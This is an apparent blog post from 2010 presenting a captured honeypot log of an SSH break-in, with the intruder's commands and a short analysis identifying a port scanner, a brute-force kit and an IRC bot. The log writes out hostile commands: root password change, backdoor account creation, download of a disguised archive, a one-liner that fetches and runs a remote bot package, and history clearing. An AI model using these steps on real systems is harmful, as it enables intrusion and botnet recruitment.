A Day in the Life of...

Honeypot session capture of a successful ssh compromise by what looks like a script kiddie. The session did not last long enough to determine the attacker's skill level or abilities though.

sales:~# w
18:02:29 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ps x
PID TTY TIME CMD
5673 pts/0 00:00:00 bash
5677 pts/0 00:00:00 ps x
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
sales:~# adduser test
Adding user `test' ...
Adding new group `test' (1001) ...
Adding new user `test' (1001) with group `test' ...
Creating home directory `/home/test' ...
Copying files from `/etc/skel' ...
Password:
Password again:

Changing the user information for test
Enter the new value, or press ENTER for the default
Username []: cd
^C
sales:~# Full Name []: cd
sales:~# cd /tmp
sales:/tmp# ls
sales:/tmp# cd /var/tmp
sales:/var/tmp# ls
sales:/var/tmp# cd
sales:~# ls
sales:~# cd /var/tmp
sales:/var/tmp# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
sales:/var/tmp# wget gambit.altervista.org/gb.jpg
--2010-10-26 18:04:06-- http://gambit.altervista.org/gb.jpg
Connecting to gambit.altervista.org:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3943354 (3M) [image/jpeg]
Saving to: `gb.jpg

100%[======================================>] 3,943,354 155K/s eta 0s

2010-10-26 18:04:31 (155 KB/s) - `gb.jpg' saved [3943354/3943354]
sales:/var/tmp# tar zxvf gb.jpg
gb
gb/58
gb/12
gb/61
gb/39
gb/60
gb/vuln.txt
gb/57
gb/14
gb/49
gb/38
gb/13
gb/ssh
gb/9
gb/51
gb/15
gb/pscan.c
gb/16
gb/41
gb/30
gb/3
gb/1
gb/54
gb/56
gb/21
gb/34
gb/pscan2
gb/skan
gb/55
gb/59
gb/ps
gb/28
gb/17
gb/31
gb/36
gb/7
gb/52
gb/29
gb/33
gb/common
gb/32
gb/x
gb/62
gb/26
gb/5
gb/23
gb/37
gb/22
gb/10
gb/6
gb/44
gb/50
gb/43
gb/47
gb/2
gb/screen
gb/11
gb/go.sh
gb/48
gb/25
gb/gen-pass.sh
gb/pass_file
gb/45
gb/19
gb/35
gb/18
gb/ss
gb/42
gb/46
gb/20
gb/24
gb/r00t
gb/8
gb/pico
gb/53
gb/4
gb/27
gb/40
sales:/var/tmp# cd gb
sales:/var/tmp/gb# chmod +x *
sales:/var/tmp/gb# ./x 41.243
___
{o,o}
|)__)
-"-"-
O RLY? ^C
sales:/var/tmp/gb# cd
sales:~# cd /var/tmp
sales:/var/tmp# ls
gb.jpg gb
sales:/var/tmp# rm -rf gb
sales:/var/tmp# rm -rf gb.jpg
sales:/var/tmp# wget http://bido.hi2.ro/signed.tgz ; tar xzvf signed.tgz ; rm -rf signed.tgz ; cd ._ ; chmod +x * ; export PATH="." ; sh
--2010-10-26 18:05:17-- http://bido.hi2.ro/signed.tgz
Connecting to bido.hi2.ro:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 891356 (870K) [application/x-gzip]
Saving to: `signed.tgz

100%[======================================>] 891,356 51K/s/s eta 0s

2010-10-26 18:05:35 (51 KB/s) - `signed.tgz' saved [891356/891356]
._
._/configure
._/1.user
._/m.lev
._/m.set
._/checkmech
._/r
._/r/raway.e
._/r/rnicks.e
._/r/rversions.e
._/r/rtsay.e
._/r/rsignoff.e
._/r/rpickup.e
._/r/rsay.e
._/r/rkicks.e
._/r/rinsult.e
._/LinkEvents
._/src
._/src/gencmd.c
._/src/vars.c
._/src/vars.o
._/src/function.c
._/src/global.h
._/src/channel.c
._/src/gencmd
._/src/socket.c
._/src/defines.h
._/src/main.c
._/src/xmech.c
._/src/config.h.in
._/src/dcc.c
._/src/cfgfile.o
._/src/trivia.o
._/src/usage.h
._/src/socket.o
._/src/com-ons.c
._/src/parse.c
._/src/commands.o
._/src/combot.o
._/src/Makefile.in
._/src/parse.o
._/src/text.h
._/src/debug.c
._/src/Makefile
._/src/trivia.c
._/src/commands.c
._/src/structs.h
._/src/link.o
._/src/channel.o
._/src/h.h
._/src/cfgfile.c
._/src/dcc.o
._/src/config.h
._/src/userlist.c
._/src/main.o
._/src/xmech.o
._/src/com-ons.o
._/src/mcmd.h
._/src/link.c
._/src/function.o
._/src/combot.c
._/src/userlist.o
._/src/debug.o
._/Makefile
._/sh
._/pico
._/m.h
._/m.pid
._/bsd
._/2.user
sales:/var/tmp/._# cd
sales:~#
sales:~#
sales:~# cd
sales:~# w
18:05:41 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ls
sales:~# history -c

The archive file gb.jpg looks like a port scanner (pscan2) and an ssh brute-force program like unixcod. You can even see him or her test it using similar syntax to unixcod. Most of the files are dictionary files containing username/password combinations. It would probably be a good idea to install breakingguard or denyhosts on your ssh enabled Linux/Unix/MacOSX system. The archive file, signed.tgz, is the Energymech IRC bot.

Labels: Unix botnet port scanner ssh brute force